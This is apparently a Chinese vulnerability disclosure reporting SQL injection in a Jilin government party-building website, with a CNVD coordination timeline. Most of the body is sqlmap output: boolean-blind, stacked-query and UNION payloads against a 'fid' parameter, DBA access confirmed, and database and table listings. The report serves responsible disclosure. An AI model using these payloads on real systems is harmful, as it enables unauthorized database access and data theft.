2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
RT
吉林机关党建存在存在多个SQL注入点http://**.**.**.**/SsResult.aspx?wd=2015http://**.**.**.**/NewsPage.aspx?fid=6450注入点不止两个,数据库为sa权限,应该可以提权,危害还是比较严重的。
sqlmap identified the following injection point(s) with a total of 106 HTTP(s) requests:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=6450 AND 4969=4969 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: fid=6450;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: fid=-5053 UNION ALL SELECT 91,91,91,91,91,91,91,91,CHAR(113)+CHAR(118)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(87)+CHAR(86)+CHAR(75)+CHAR(79)+CHAR(115)+CHAR(108)+CHAR(104)+CHAR(100)+CHAR(104)+CHAR(103)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(113),91,91,91,91,91,91,91,91,91-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=6450 AND 6184=6184 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: fid=6450;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: fid=-8605 UNION ALL SELECT 96,96,96,96,96,96,96,96,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(69)+CHAR(75)+CHAR(100)+CHAR(102)+CHAR(119)+CHAR(77)+CHAR(71)+CHAR(97)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113),96,96,96,96,96,96,96,96,96-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap resumed the following injection point(s) from stored session:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=6450 AND 6184=6184 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: fid=6450;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: fid=-8605 UNION ALL SELECT 96,96,96,96,96,96,96,96,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(69)+CHAR(75)+CHAR(100)+CHAR(102)+CHAR(119)+CHAR(77)+CHAR(71)+CHAR(97)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113),96,96,96,96,96,96,96,96,96-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'dgw'current user is DBA: Trueavailable databases [15]:[*] bcgxj[*] dgw[*] GhptSQL[*] gwgh[*] hds0670494_db[*] lll[*] master[*] model[*] msdb[*] MySqlDb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] Z_user[*] zxqy
看看当前数据库的情况
Database: dgw+--------------------+---------+| Table | Entries |+--------------------+---------+| dbo.NewsView | 35679 || dbo.Newstext | 10435 || dbo.PtNewsView | 6314 || dbo.Magazinetext | 1828 || dbo.Table_Tj | 1483 || dbo.text1 | 1011 || dbo.DirTable | 191 || dbo.users | 157 || dbo.NewsType | 126 || dbo.Product_S | 116 || dbo.Product_S | 116 || dbo.Ptusers | 65 || dbo.MagazineType | 53 || dbo.Movietable | 42 || dbo.PlTable | 30 || dbo.MainModle | 23 || dbo.Organization_S | 20 || dbo.Organization_S | 20 || dbo.boss | 10 || dbo.TableQx | 1 |+--------------------+---------+
由于是政府网站,点到为止吧。
危害等级:中
漏洞Rank:9
确认时间:2015-12-04 13:23
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。
暂无
